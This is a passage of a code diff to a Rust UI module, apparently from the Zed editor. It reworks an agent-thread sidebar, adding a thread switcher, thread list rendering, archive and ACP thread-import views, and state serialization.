self.toggle_thread_switcher_impl(action.select_last, window, cx); + } + + fn toggle_thread_switcher_impl( + &mut self, + select_last: bool, + window: &mut Window, + cx: &mut Context, + ) { + if let Some(thread_switcher) = &self.thread_switcher { + thread_switcher.update(cx, |switcher, cx| { + if select_last { + switcher.select_last(cx); + } else { + switcher.cycle_selection(cx); + } + }); + return; + } + + let entries = self.mru_threads_for_switcher(cx); + if entries.len() < 2 { + return; + } + + let weak_multi_workspace = self.multi_workspace.clone(); + + let original_metadata = match &self.active_entry { + Some(ActiveEntry::Thread { session_id, .. 
}) => entries + .iter() + .find(|e| &e.session_id == session_id) + .map(|e| e.metadata.clone()), + _ => None, + }; + let original_workspace = self + .multi_workspace + .upgrade() + .map(|mw| mw.read(cx).workspace().clone()); + + let thread_switcher = cx.new(|cx| ThreadSwitcher::new(entries, select_last, window, cx)); + + let mut subscriptions = Vec::new(); + + subscriptions.push(cx.subscribe_in(&thread_switcher, window, { + let thread_switcher = thread_switcher.clone(); + move |this, _emitter, event: &ThreadSwitcherEvent, window, cx| match event { + ThreadSwitcherEvent::Preview { + metadata, + workspace, + } => { + if let Some(mw) = weak_multi_workspace.upgrade() { + mw.update(cx, |mw, cx| { + mw.activate(workspace.clone(), window, cx); + }); + } + this.active_entry = Some(ActiveEntry::Thread { + session_id: metadata.session_id.clone(), + workspace: workspace.clone(), + }); + this.update_entries(cx); + Self::load_agent_thread_in_workspace(workspace, metadata, false, window, cx); + let focus = thread_switcher.focus_handle(cx); + window.focus(&focus, cx); + } + ThreadSwitcherEvent::Confirmed { + metadata, + workspace, + } => { + if let Some(mw) = weak_multi_workspace.upgrade() { + mw.update(cx, |mw, cx| { + mw.activate(workspace.clone(), window, cx); + }); + } + this.record_thread_access(&metadata.session_id); + this.active_entry = Some(ActiveEntry::Thread { + session_id: metadata.session_id.clone(), + workspace: workspace.clone(), + }); + this.update_entries(cx); + Self::load_agent_thread_in_workspace(workspace, metadata, false, window, cx); + this.dismiss_thread_switcher(cx); + workspace.update(cx, |workspace, cx| { + workspace.focus_panel::(window, cx); + }); + } + ThreadSwitcherEvent::Dismissed => { + if let Some(mw) = weak_multi_workspace.upgrade() { + if let Some(original_ws) = &original_workspace { + mw.update(cx, |mw, cx| { + mw.activate(original_ws.clone(), window, cx); + }); + } + } + if let Some(metadata) = &original_metadata { + if let Some(original_ws) = 
&original_workspace { + this.active_entry = Some(ActiveEntry::Thread { + session_id: metadata.session_id.clone(), + workspace: original_ws.clone(), + }); + } + this.update_entries(cx); + if let Some(original_ws) = &original_workspace { + Self::load_agent_thread_in_workspace( + original_ws, + metadata, + false, + window, + cx, + ); + } + } + this.dismiss_thread_switcher(cx); + } + } + })); + + subscriptions.push(cx.subscribe_in( + &thread_switcher, + window, + |this, _emitter, _event: &gpui::DismissEvent, _window, cx| { + this.dismiss_thread_switcher(cx); + }, + )); + + let focus = thread_switcher.focus_handle(cx); + let overlay_view = gpui::AnyView::from(thread_switcher.clone()); + + // Replay the initial preview that was emitted during construction + // before subscriptions were wired up. + let initial_preview = thread_switcher + .read(cx) + .selected_entry() + .map(|entry| (entry.metadata.clone(), entry.workspace.clone())); + + self.thread_switcher = Some(thread_switcher); + self._thread_switcher_subscriptions = subscriptions; + if let Some(mw) = self.multi_workspace.upgrade() { + mw.update(cx, |mw, cx| { + mw.set_sidebar_overlay(Some(overlay_view), cx); + }); + } + + if let Some((metadata, workspace)) = initial_preview { + if let Some(mw) = self.multi_workspace.upgrade() { + mw.update(cx, |mw, cx| { + mw.activate(workspace.clone(), window, cx); + }); + } + self.active_entry = Some(ActiveEntry::Thread { + session_id: metadata.session_id.clone(), + workspace: workspace.clone(), + }); + self.update_entries(cx); + Self::load_agent_thread_in_workspace(&workspace, &metadata, false, window, cx); + } + + window.focus(&focus, cx); + } + + fn render_thread( + &self, + ix: usize, + thread: &ThreadEntry, + is_active: bool, + is_focused: bool, + cx: &mut Context, + ) -> AnyElement { + let has_notification = self + .contents + .is_thread_notified(&thread.metadata.session_id); + + let title: SharedString = thread.metadata.title.clone(); + let metadata = 
thread.metadata.clone(); + let thread_workspace = thread.workspace.clone(); + + let is_hovered = self.hovered_thread_index == Some(ix); + let is_selected = is_active; + let is_running = matches!( + thread.status, + AgentThreadStatus::Running | AgentThreadStatus::WaitingForConfirmation + ); + + let session_id_for_delete = thread.metadata.session_id.clone(); + let focus_handle = self.focus_handle.clone(); + + let id = SharedString::from(format!("thread-entry-{}", ix)); + + let color = cx.theme().colors(); + let sidebar_bg = color + .title_bar_background + .blend(color.panel_background.opacity(0.25)); + + let timestamp = format_history_entry_timestamp( + self.thread_last_message_sent_or_queued + .get(&thread.metadata.session_id) + .copied() + .or(thread.metadata.created_at) + .unwrap_or(thread.metadata.updated_at), + ); + + ThreadItem::new(id, title) + .base_bg(sidebar_bg) + .icon(thread.icon) + .status(thread.status) + .when_some(thread.icon_from_external_svg.clone(), |this, svg| { + this.custom_icon_from_external_svg(svg) + }) + .worktrees( + thread + .worktrees + .iter() + .map(|wt| ThreadItemWorktreeInfo { + name: wt.name.clone(), + full_path: wt.full_path.clone(), + highlight_positions: wt.highlight_positions.clone(), + }) + .collect(), + ) + .timestamp(timestamp) + .highlight_positions(thread.highlight_positions.to_vec()) + .title_generating(thread.is_title_generating) + .notified(has_notification) + .when(thread.diff_stats.lines_added > 0, |this| { + this.added(thread.diff_stats.lines_added as usize) + }) + .when(thread.diff_stats.lines_removed > 0, |this| { + this.removed(thread.diff_stats.lines_removed as usize) + }) + .selected(is_selected) + .focused(is_focused) + .hovered(is_hovered) + .on_hover(cx.listener(move |this, is_hovered: &bool, _window, cx| { + if *is_hovered { + this.hovered_thread_index = Some(ix); + } else if this.hovered_thread_index == Some(ix) { + this.hovered_thread_index = None; + } + cx.notify(); + })) + .when(is_hovered && is_running, 
|this| { + this.action_slot( + IconButton::new("stop-thread", IconName::Stop) + .icon_size(IconSize::Small) + .icon_color(Color::Error) + .style(ButtonStyle::Tinted(TintColor::Error)) + .tooltip(Tooltip::text("Stop Generation")) + .on_click({ + let session_id = session_id_for_delete.clone(); + cx.listener(move |this, _, _window, cx| { + this.stop_thread(&session_id, cx); + }) + }), + ) + }) + .when(is_hovered && !is_running, |this| { + this.action_slot( + IconButton::new("archive-thread", IconName::Archive) + .icon_size(IconSize::Small) + .icon_color(Color::Muted) + .tooltip({ + let focus_handle = focus_handle.clone(); + move |_window, cx| { + Tooltip::for_action_in( + "Archive Thread", + &RemoveSelectedThread, + &focus_handle, + cx, + ) + } + }) + .on_click({ + let session_id = session_id_for_delete.clone(); + cx.listener(move |this, _, window, cx| { + this.archive_thread(&session_id, window, cx); + }) + }), + ) + }) + .on_click({ + cx.listener(move |this, _, window, cx| { + this.selection = None; + match &thread_workspace { + ThreadEntryWorkspace::Open(workspace) => { + this.activate_thread(metadata.clone(), workspace, window, cx); + } + ThreadEntryWorkspace::Closed(path_list) => { + this.open_workspace_and_activate_thread( + metadata.clone(), + path_list.clone(), + window, + cx, + ); + } + } + }) + }) + .into_any_element() + } + + fn render_filter_input(&self, cx: &mut Context) -> impl IntoElement { + div() + .min_w_0() + .flex_1() + .capture_action( + cx.listener(|this, _: &editor::actions::Newline, window, cx| { + this.editor_confirm(window, cx); + }), + ) + .child(self.filter_editor.clone()) + } + + fn render_recent_projects_button(&self, cx: &mut Context) -> impl IntoElement { + let multi_workspace = self.multi_workspace.upgrade(); + + let workspace = multi_workspace + .as_ref() + .map(|mw| mw.read(cx).workspace().downgrade()); + + let focus_handle = workspace + .as_ref() + .and_then(|ws| ws.upgrade()) + .map(|w| w.read(cx).focus_handle(cx)) + 
.unwrap_or_else(|| cx.focus_handle()); + + let sibling_workspace_ids: HashSet = multi_workspace + .as_ref() + .map(|mw| { + mw.read(cx) + .workspaces() + .filter_map(|ws| ws.read(cx).database_id()) + .collect() + }) + .unwrap_or_default(); + + let popover_handle = self.recent_projects_popover_handle.clone(); + + PopoverMenu::new("sidebar-recent-projects-menu") + .with_handle(popover_handle) + .menu(move |window, cx| { + workspace.as_ref().map(|ws| { + SidebarRecentProjects::popover( + ws.clone(), + sibling_workspace_ids.clone(), + focus_handle.clone(), + window, + cx, + ) + }) + }) + .trigger_with_tooltip( + IconButton::new("open-project", IconName::OpenFolder) + .icon_size(IconSize::Small) + .selected_style(ButtonStyle::Tinted(TintColor::Accent)), + |_window, cx| { + Tooltip::for_action( + "Add Project", + &OpenRecent { + create_new_window: false, + }, + cx, + ) + }, + ) + .offset(gpui::Point { + x: px(-2.0), + y: px(-2.0), + }) + .anchor(gpui::Corner::BottomRight) + } + + fn render_view_more( + &self, + ix: usize, + path_list: &PathList, + is_fully_expanded: bool, + is_selected: bool, + cx: &mut Context, + ) -> AnyElement { + let path_list = path_list.clone(); + let id = SharedString::from(format!("view-more-{}", ix)); + + let label: SharedString = if is_fully_expanded { + "Collapse".into() + } else { + "View More".into() + }; + + ThreadItem::new(id, label) + .focused(is_selected) + .icon_visible(false) + .title_label_color(Color::Muted) + .on_click(cx.listener(move |this, _, _window, cx| { + this.selection = None; + if is_fully_expanded { + this.expanded_groups.remove(&path_list); + } else { + let current = this.expanded_groups.get(&path_list).copied().unwrap_or(0); + this.expanded_groups.insert(path_list.clone(), current + 1); + } + this.serialize(cx); + this.update_entries(cx); + })) + .into_any_element() + } + + fn new_thread_in_group( + &mut self, + _: &NewThreadInGroup, + window: &mut Window, + cx: &mut Context, + ) { + // If there is a keyboard selection, 
walk backwards through + // `project_header_indices` to find the header that owns the selected + // row. Otherwise fall back to the active workspace. + let workspace = if let Some(selected_ix) = self.selection { + self.contents + .project_header_indices + .iter() + .rev() + .find(|&&header_ix| header_ix <= selected_ix) + .and_then(|&header_ix| match &self.contents.entries[header_ix] { + ListEntry::ProjectHeader { key, .. } => { + self.workspace_for_group(key.path_list(), cx) + } + _ => None, + }) + } else { + // Use the currently active workspace. + self.multi_workspace + .upgrade() + .map(|mw| mw.read(cx).workspace().clone()) + }; + + let Some(workspace) = workspace else { + return; + }; + + self.create_new_thread(&workspace, window, cx); + } + + fn create_new_thread( + &mut self, + workspace: &Entity, + window: &mut Window, + cx: &mut Context, + ) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { + return; + }; + + self.active_entry = Some(ActiveEntry::Draft(workspace.clone())); + + multi_workspace.update(cx, |multi_workspace, cx| { + multi_workspace.activate(workspace.clone(), window, cx); + }); + + workspace.update(cx, |workspace, cx| { + if let Some(agent_panel) = workspace.panel::(cx) { + agent_panel.update(cx, |panel, cx| { + panel.new_thread(&NewThread, window, cx); + }); + } + workspace.focus_panel::(window, cx); + }); + } + + fn render_draft_thread( + &self, + ix: usize, + is_active: bool, + worktrees: &[WorktreeInfo], + is_selected: bool, + cx: &mut Context, + ) -> AnyElement { + let label: SharedString = if is_active { + self.active_draft_text(cx) + .unwrap_or_else(|| "Untitled Thread".into()) + } else { + "Untitled Thread".into() + }; + + let id = SharedString::from(format!("draft-thread-btn-{}", ix)); + + let thread_item = ThreadItem::new(id, label) + .icon(IconName::Plus) + .icon_color(Color::Custom(cx.theme().colors().icon_muted.opacity(0.8))) + .worktrees( + worktrees + .iter() + .map(|wt| ThreadItemWorktreeInfo { + name: 
wt.name.clone(), + full_path: wt.full_path.clone(), + highlight_positions: wt.highlight_positions.clone(), + }) + .collect(), + ) + .selected(true) + .focused(is_selected); + + div() + .on_mouse_down(gpui::MouseButton::Left, |_, _, cx| { + cx.stop_propagation(); + }) + .child(thread_item) + .into_any_element() + } + + fn render_new_thread( + &self, + ix: usize, + key: &ProjectGroupKey, + worktrees: &[WorktreeInfo], + is_selected: bool, + cx: &mut Context, + ) -> AnyElement { + let label: SharedString = DEFAULT_THREAD_TITLE.into(); + let path_list = key.path_list().clone(); + + let id = SharedString::from(format!("new-thread-btn-{}", ix)); + + let thread_item = ThreadItem::new(id, label) + .icon(IconName::Plus) + .icon_color(Color::Custom(cx.theme().colors().icon_muted.opacity(0.8))) + .worktrees( + worktrees + .iter() + .map(|wt| ThreadItemWorktreeInfo { + name: wt.name.clone(), + full_path: wt.full_path.clone(), + highlight_positions: wt.highlight_positions.clone(), + }) + .collect(), + ) + .selected(false) + .focused(is_selected) + .on_click(cx.listener(move |this, _, window, cx| { + this.selection = None; + if let Some(workspace) = this.workspace_for_group(&path_list, cx) { + this.create_new_thread(&workspace, window, cx); + } else { + this.open_workspace_for_group(&path_list, window, cx); + } + })); + + thread_item.into_any_element() + } + + fn render_no_results(&self, cx: &mut Context) -> impl IntoElement { + let has_query = self.has_filter_query(cx); + let message = if has_query { + "No threads match your search." 
+ } else { + "No threads yet" + }; + + v_flex() + .id("sidebar-no-results") + .p_4() + .size_full() + .items_center() + .justify_center() + .child( + Label::new(message) + .size(LabelSize::Small) + .color(Color::Muted), + ) + } + + fn render_empty_state(&self, cx: &mut Context) -> impl IntoElement { + v_flex() + .id("sidebar-empty-state") + .p_4() + .size_full() + .items_center() + .justify_center() + .gap_1() + .track_focus(&self.focus_handle(cx)) + .child( + Button::new("open_project", "Open Project") + .full_width() + .key_binding(KeyBinding::for_action(&workspace::Open::default(), cx)) + .on_click(|_, window, cx| { + window.dispatch_action( + Open { + create_new_window: false, + } + .boxed_clone(), + cx, + ); + }), + ) + .child( + h_flex() + .w_1_2() + .gap_2() + .child(Divider::horizontal().color(ui::DividerColor::Border)) + .child(Label::new("or").size(LabelSize::XSmall).color(Color::Muted)) + .child(Divider::horizontal().color(ui::DividerColor::Border)), + ) + .child( + Button::new("clone_repo", "Clone Repository") + .full_width() + .on_click(|_, window, cx| { + window.dispatch_action(git::Clone.boxed_clone(), cx); + }), + ) + } + + fn render_sidebar_header( + &self, + no_open_projects: bool, + window: &Window, + cx: &mut Context, + ) -> impl IntoElement { + let has_query = self.has_filter_query(cx); + let sidebar_on_left = self.side(cx) == SidebarSide::Left; + let sidebar_on_right = self.side(cx) == SidebarSide::Right; + let not_fullscreen = !window.is_fullscreen(); + let traffic_lights = cfg!(target_os = "macos") && not_fullscreen && sidebar_on_left; + let left_window_controls = !cfg!(target_os = "macos") && not_fullscreen && sidebar_on_left; + let right_window_controls = + !cfg!(target_os = "macos") && not_fullscreen && sidebar_on_right; + let header_height = platform_title_bar_height(window); + + h_flex() + .h(header_height) + .mt_px() + .pb_px() + .when(left_window_controls, |this| { + this.children(Self::render_left_window_controls(window, cx)) + }) + 
.map(|this| { + if traffic_lights { + this.pl(px(ui::utils::TRAFFIC_LIGHT_PADDING)) + } else if !left_window_controls { + this.pl_1p5() + } else { + this + } + }) + .when(!right_window_controls, |this| this.pr_1p5()) + .gap_1() + .when(!no_open_projects, |this| { + this.border_b_1() + .border_color(cx.theme().colors().border) + .when(traffic_lights, |this| { + this.child(Divider::vertical().color(ui::DividerColor::Border)) + }) + .child( + div().ml_1().child( + Icon::new(IconName::MagnifyingGlass) + .size(IconSize::Small) + .color(Color::Muted), + ), + ) + .child(self.render_filter_input(cx)) + .child( + h_flex() + .gap_1() + .when( + self.selection.is_some() + && !self.filter_editor.focus_handle(cx).is_focused(window), + |this| this.child(KeyBinding::for_action(&FocusSidebarFilter, cx)), + ) + .when(has_query, |this| { + this.child( + IconButton::new("clear_filter", IconName::Close) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Clear Search")) + .on_click(cx.listener(|this, _, window, cx| { + this.reset_filter_editor_text(window, cx); + this.update_entries(cx); + })), + ) + }), + ) + }) + .when(right_window_controls, |this| { + this.children(Self::render_right_window_controls(window, cx)) + }) + } + + fn render_left_window_controls(window: &Window, cx: &mut App) -> Option { + platform_title_bar::render_left_window_controls( + cx.button_layout(), + Box::new(CloseWindow), + window, + ) + } + + fn render_right_window_controls(window: &Window, cx: &mut App) -> Option { + platform_title_bar::render_right_window_controls( + cx.button_layout(), + Box::new(CloseWindow), + window, + ) + } + + fn render_sidebar_toggle_button(&self, _cx: &mut Context) -> impl IntoElement { + let on_right = AgentSettings::get_global(_cx).sidebar_side() == SidebarSide::Right; + + sidebar_side_context_menu("sidebar-toggle-menu", _cx) + .anchor(if on_right { + gpui::Corner::BottomRight + } else { + gpui::Corner::BottomLeft + }) + .attach(if on_right { + gpui::Corner::TopRight + } else 
{ + gpui::Corner::TopLeft + }) + .trigger(move |_is_active, _window, _cx| { + let icon = if on_right { + IconName::ThreadsSidebarRightOpen + } else { + IconName::ThreadsSidebarLeftOpen + }; + IconButton::new("sidebar-close-toggle", icon) + .icon_size(IconSize::Small) + .tooltip(Tooltip::element(move |_window, cx| { + v_flex() + .gap_1() + .child( + h_flex() + .gap_2() + .justify_between() + .child(Label::new("Toggle Sidebar")) + .child(KeyBinding::for_action(&ToggleWorkspaceSidebar, cx)), + ) + .child( + h_flex() + .pt_1() + .gap_2() + .border_t_1() + .border_color(cx.theme().colors().border_variant) + .justify_between() + .child(Label::new("Focus Sidebar")) + .child(KeyBinding::for_action(&FocusWorkspaceSidebar, cx)), + ) + .into_any_element() + })) + .on_click(|_, window, cx| { + if let Some(multi_workspace) = window.root::().flatten() { + multi_workspace.update(cx, |multi_workspace, cx| { + multi_workspace.close_sidebar(window, cx); + }); + } + }) + }) + } + + fn render_sidebar_bottom_bar(&mut self, cx: &mut Context) -> impl IntoElement { + let is_archive = matches!(self.view, SidebarView::Archive(..)); + let show_import_button = is_archive && !self.should_render_acp_import_onboarding(cx); + let on_right = self.side(cx) == SidebarSide::Right; + + let action_buttons = h_flex() + .gap_1() + .when(on_right, |this| this.flex_row_reverse()) + .when(show_import_button, |this| { + this.child( + IconButton::new("thread-import", IconName::ThreadImport) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Import ACP Threads")) + .on_click(cx.listener(|this, _, window, cx| { + this.show_archive(window, cx); + this.show_thread_import_modal(window, cx); + })), + ) + }) + .child( + IconButton::new("archive", IconName::Archive) + .icon_size(IconSize::Small) + .toggle_state(is_archive) + .tooltip(move |_, cx| { + Tooltip::for_action("Toggle Archived Threads", &ToggleArchive, cx) + }) + .on_click(cx.listener(|this, _, window, cx| { + this.toggle_archive(&ToggleArchive, 
window, cx); + })), + ) + .child(self.render_recent_projects_button(cx)); + + h_flex() + .p_1() + .gap_1() + .when(on_right, |this| this.flex_row_reverse()) + .justify_between() + .border_t_1() + .border_color(cx.theme().colors().border) + .child(self.render_sidebar_toggle_button(cx)) + .child(action_buttons) + } + + fn active_workspace(&self, cx: &App) -> Option> { + self.multi_workspace + .upgrade() + .map(|w| w.read(cx).workspace().clone()) + } + + fn show_thread_import_modal(&mut self, window: &mut Window, cx: &mut Context) { + let Some(active_workspace) = self.active_workspace(cx) else { + return; + }; + + let Some(agent_registry_store) = AgentRegistryStore::try_global(cx) else { + return; + }; + + let agent_server_store = active_workspace + .read(cx) + .project() + .read(cx) + .agent_server_store() + .clone(); + + let workspace_handle = active_workspace.downgrade(); + let multi_workspace = self.multi_workspace.clone(); + + active_workspace.update(cx, |workspace, cx| { + workspace.toggle_modal(window, cx, |window, cx| { + ThreadImportModal::new( + agent_server_store, + agent_registry_store, + workspace_handle.clone(), + multi_workspace.clone(), + window, + cx, ) - } - } + }); + }); } - fn render_editor( - &self, - editor: &Arc, - window: &mut Window, - cx: &mut Context>, - ) -> Div { - h_flex() - .h(Tab::container_height(cx)) + fn should_render_acp_import_onboarding(&self, cx: &App) -> bool { + let has_external_agents = self + .active_workspace(cx) + .map(|ws| { + ws.read(cx) + .project() + .read(cx) + .agent_server_store() + .read(cx) + .has_external_agents() + }) + .unwrap_or(false); + + has_external_agents && !AcpThreadImportOnboarding::dismissed(cx) + } + + fn render_acp_import_onboarding(&mut self, cx: &mut Context) -> impl IntoElement { + let description = + "Import threads from your ACP agents — whether started in Zed or another client."; + + let bg = cx.theme().colors().text_accent; + + v_flex() + .min_w_0() .w_full() - .px_2() - .gap_2() - 
.justify_between() - .border_b_1() + .p_2() + .border_t_1() .border_color(cx.theme().colors().border) + .bg(linear_gradient( + 360., + linear_color_stop(bg.opacity(0.06), 1.), + linear_color_stop(bg.opacity(0.), 0.), + )) .child( - Icon::new(IconName::MagnifyingGlass) - .color(Color::Muted) - .size(IconSize::Small), + h_flex() + .min_w_0() + .w_full() + .gap_1() + .justify_between() + .child(Label::new("Looking for ACP threads?")) + .child( + IconButton::new("close-onboarding", IconName::Close) + .icon_size(IconSize::Small) + .on_click(|_, _window, cx| AcpThreadImportOnboarding::dismiss(cx)), + ), + ) + .child(Label::new(description).color(Color::Muted).mb_2()) + .child( + Button::new("import-acp", "Import ACP Threads") + .full_width() + .style(ButtonStyle::OutlinedCustom(cx.theme().colors().border)) + .label_size(LabelSize::Small) + .start_icon( + Icon::new(IconName::ThreadImport) + .size(IconSize::Small) + .color(Color::Muted), + ) + .on_click(cx.listener(|this, _, window, cx| { + this.show_archive(window, cx); + this.show_thread_import_modal(window, cx); + })), ) - .child(editor.render(window, cx)) } -} -pub struct Sidebar { - multi_workspace: Entity, - width: Pixels, - picker: Entity>, - _subscription: Subscription, - _project_subscriptions: Vec, - _agent_panel_subscriptions: Vec, - _thread_subscriptions: Vec, - #[cfg(any(test, feature = "test-support"))] - test_thread_infos: HashMap, - #[cfg(any(test, feature = "test-support"))] - test_recent_project_thread_titles: HashMap, - _fetch_recent_projects: Task<()>, -} + fn toggle_archive(&mut self, _: &ToggleArchive, window: &mut Window, cx: &mut Context) { + match &self.view { + SidebarView::ThreadList => self.show_archive(window, cx), + SidebarView::Archive(_) => self.show_thread_list(window, cx), + } + } -impl EventEmitter for Sidebar {} + fn show_archive(&mut self, window: &mut Window, cx: &mut Context) { + let Some(active_workspace) = self + .multi_workspace + .upgrade() + .map(|w| 
w.read(cx).workspace().clone()) + else { + return; + }; + let Some(agent_panel) = active_workspace.read(cx).panel::(cx) else { + return; + }; -impl Sidebar { - pub fn new( - multi_workspace: Entity, - window: &mut Window, - cx: &mut Context, - ) -> Self { - let delegate = WorkspacePickerDelegate::new(multi_workspace.clone()); - let picker = cx.new(|cx| { - Picker::list(delegate, window, cx) - .max_height(None) - .show_scrollbar(true) - .modal(false) + let agent_server_store = active_workspace + .read(cx) + .project() + .read(cx) + .agent_server_store() + .downgrade(); + + let agent_connection_store = agent_panel.read(cx).connection_store().downgrade(); + + let archive_view = cx.new(|cx| { + ThreadsArchiveView::new( + active_workspace.downgrade(), + agent_connection_store.clone(), + agent_server_store.clone(), + window, + cx, + ) }); - let subscription = cx.observe_in( - &multi_workspace, + let subscription = cx.subscribe_in( + &archive_view, window, - |this, _multi_workspace, window, cx| { - this.update_entries(window, cx); + |this, _, event: &ThreadsArchiveViewEvent, window, cx| match event { + ThreadsArchiveViewEvent::Close => { + this.show_thread_list(window, cx); + } + ThreadsArchiveViewEvent::Unarchive { thread } => { + this.show_thread_list(window, cx); + this.activate_archived_thread(thread.clone(), window, cx); + } }, ); - let fetch_recent_projects = { - let picker = picker.downgrade(); - let fs = ::global(cx); - cx.spawn_in(window, async move |_this, cx| { - let projects = get_recent_projects(None, None, fs).await; - - cx.update(|window, cx| { - if let Some(picker) = picker.upgrade() { - picker.update(cx, |picker, cx| { - picker.delegate.set_recent_projects(projects, cx); - let query = picker.query(cx); - picker.update_matches(query, window, cx); - }); - } - }) - .log_err(); - }) - }; - - let mut this = Self { - multi_workspace, - width: DEFAULT_WIDTH, - picker, - _subscription: subscription, - _project_subscriptions: Vec::new(), - 
_agent_panel_subscriptions: Vec::new(), - _thread_subscriptions: Vec::new(), - #[cfg(any(test, feature = "test-support"))] - test_thread_infos: HashMap::new(), - #[cfg(any(test, feature = "test-support"))] - test_recent_project_thread_titles: HashMap::new(), - _fetch_recent_projects: fetch_recent_projects, - }; - this.update_entries(window, cx); - this + self._subscriptions.push(subscription); + self.view = SidebarView::Archive(archive_view.clone()); + archive_view.update(cx, |view, cx| view.focus_filter_editor(window, cx)); + self.serialize(cx); + cx.notify(); } - fn subscribe_to_projects( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> Vec { - let projects: Vec<_> = self - .multi_workspace - .read(cx) - .workspaces() - .iter() - .map(|w| w.read(cx).project().clone()) - .collect(); - - projects - .iter() - .map(|project| { - cx.subscribe_in( - project, - window, - |this, _project, event, window, cx| match event { - ProjectEvent::WorktreeAdded(_) - | ProjectEvent::WorktreeRemoved(_) - | ProjectEvent::WorktreeOrderChanged => { - this.update_entries(window, cx); - } - _ => {} - }, - ) - }) - .collect() + fn show_thread_list(&mut self, window: &mut Window, cx: &mut Context) { + self.view = SidebarView::ThreadList; + self._subscriptions.clear(); + let handle = self.filter_editor.read(cx).focus_handle(cx); + handle.focus(window, cx); + self.serialize(cx); + cx.notify(); } +} - fn build_workspace_thread_entries( - &self, - multi_workspace: &MultiWorkspace, - cx: &App, - ) -> (Vec, usize) { - #[allow(unused_mut)] - let mut entries: Vec = multi_workspace - .workspaces() - .iter() - .enumerate() - .map(|(index, workspace)| WorkspaceThreadEntry::new(index, workspace, cx)) - .collect(); +impl WorkspaceSidebar for Sidebar { + fn width(&self, _cx: &App) -> Pixels { + self.width + } - #[cfg(any(test, feature = "test-support"))] - for (index, info) in &self.test_thread_infos { - if let Some(entry) = entries.get_mut(*index) { - entry.thread_info = 
Some(info.clone()); - } - } + fn set_width(&mut self, width: Option, cx: &mut Context) { + self.width = width.unwrap_or(DEFAULT_WIDTH).clamp(MIN_WIDTH, MAX_WIDTH); + cx.notify(); + } - (entries, multi_workspace.active_workspace_index()) + fn has_notifications(&self, _cx: &App) -> bool { + !self.contents.notified_threads.is_empty() } - #[cfg(any(test, feature = "test-support"))] - pub fn set_test_recent_projects( - &self, - projects: Vec, - cx: &mut Context, - ) { - self.picker.update(cx, |picker, _cx| { - picker.delegate.recent_projects = projects; - }); + fn is_threads_list_view_active(&self) -> bool { + matches!(self.view, SidebarView::ThreadList) } - #[cfg(any(test, feature = "test-support"))] - pub fn set_test_thread_info( - &mut self, - index: usize, - title: SharedString, - status: AgentThreadStatus, - ) { - self.test_thread_infos.insert( - index, - AgentThreadInfo { - title, - status, - icon: IconName::ZedAgent, - }, - ); + fn side(&self, cx: &App) -> SidebarSide { + AgentSettings::get_global(cx).sidebar_side() } - #[cfg(any(test, feature = "test-support"))] - pub fn set_test_recent_project_thread_title( - &mut self, - full_path: SharedString, - title: SharedString, - cx: &mut Context, - ) { - self.test_recent_project_thread_titles - .insert(full_path.clone(), title.clone()); - self.picker.update(cx, |picker, _cx| { - picker - .delegate - .recent_project_thread_titles - .insert(full_path, title); - }); + fn prepare_for_focus(&mut self, _window: &mut Window, cx: &mut Context) { + self.selection = None; + cx.notify(); } - fn subscribe_to_agent_panels( + fn toggle_thread_switcher( &mut self, + select_last: bool, window: &mut Window, cx: &mut Context, - ) -> Vec { - let workspaces: Vec<_> = self.multi_workspace.read(cx).workspaces().to_vec(); + ) { + self.toggle_thread_switcher_impl(select_last, window, cx); + } - workspaces - .iter() - .map(|workspace| { - if let Some(agent_panel) = workspace.read(cx).panel::(cx) { - cx.subscribe_in( - &agent_panel, - window, - 
|this, _, _event: &AgentPanelEvent, window, cx| { - this.update_entries(window, cx); - }, - ) - } else { - // Panel hasn't loaded yet — observe the workspace so we - // re-subscribe once the panel appears on its dock. - cx.observe_in(workspace, window, |this, _, window, cx| { - this.update_entries(window, cx); - }) - } - }) - .collect() + fn serialized_state(&self, _cx: &App) -> Option { + let serialized = SerializedSidebar { + width: Some(f32::from(self.width)), + collapsed_groups: self + .collapsed_groups + .iter() + .map(|pl| pl.serialize()) + .collect(), + expanded_groups: self + .expanded_groups + .iter() + .map(|(pl, count)| (pl.serialize(), *count)) + .collect(), + active_view: match self.view { + SidebarView::ThreadList => SerializedSidebarView::ThreadList, + SidebarView::Archive(_) => SerializedSidebarView::Archive, + }, + }; + serde_json::to_string(&serialized).ok() } - fn subscribe_to_threads( + fn restore_serialized_state( &mut self, + state: &str, window: &mut Window, cx: &mut Context, - ) -> Vec { - let workspaces: Vec<_> = self.multi_workspace.read(cx).workspaces().to_vec(); - - workspaces - .iter() - .filter_map(|workspace| { - let agent_panel = workspace.read(cx).panel::(cx)?; - let thread = agent_panel.read(cx).active_agent_thread(cx)?; - Some(cx.observe_in(&thread, window, |this, _, window, cx| { - this.update_entries(window, cx); - })) - }) - .collect() - } - - /// Reconciles the sidebar's displayed entries with the current state of all - /// workspaces and their agent threads. 
- fn update_entries(&mut self, window: &mut Window, cx: &mut Context) { - let multi_workspace = self.multi_workspace.clone(); - cx.defer_in(window, move |this, window, cx| { - if !this.multi_workspace.read(cx).multi_workspace_enabled(cx) { - return; + ) { + if let Some(serialized) = serde_json::from_str::(state).log_err() { + if let Some(width) = serialized.width { + self.width = px(width).clamp(MIN_WIDTH, MAX_WIDTH); } - - this._project_subscriptions = this.subscribe_to_projects(window, cx); - this._agent_panel_subscriptions = this.subscribe_to_agent_panels(window, cx); - this._thread_subscriptions = this.subscribe_to_threads(window, cx); - let (entries, active_index) = multi_workspace.read_with(cx, |multi_workspace, cx| { - this.build_workspace_thread_entries(multi_workspace, cx) - }); - - let had_notifications = !this.picker.read(cx).delegate.notified_workspaces.is_empty(); - this.picker.update(cx, |picker, cx| { - picker.delegate.set_entries(entries, active_index, cx); - let query = picker.query(cx); - picker.update_matches(query, window, cx); - }); - let has_notifications = !this.picker.read(cx).delegate.notified_workspaces.is_empty(); - if had_notifications != has_notifications { - multi_workspace.update(cx, |_, cx| cx.notify()); + self.collapsed_groups = serialized + .collapsed_groups + .into_iter() + .map(|s| PathList::deserialize(&s)) + .collect(); + self.expanded_groups = serialized + .expanded_groups + .into_iter() + .map(|(s, count)| (PathList::deserialize(&s), count)) + .collect(); + if serialized.active_view == SerializedSidebarView::Archive { + cx.defer_in(window, |this, window, cx| { + this.show_archive(window, cx); + }); } - }); - } -} - -impl WorkspaceSidebar for Sidebar { - fn width(&self, _cx: &App) -> 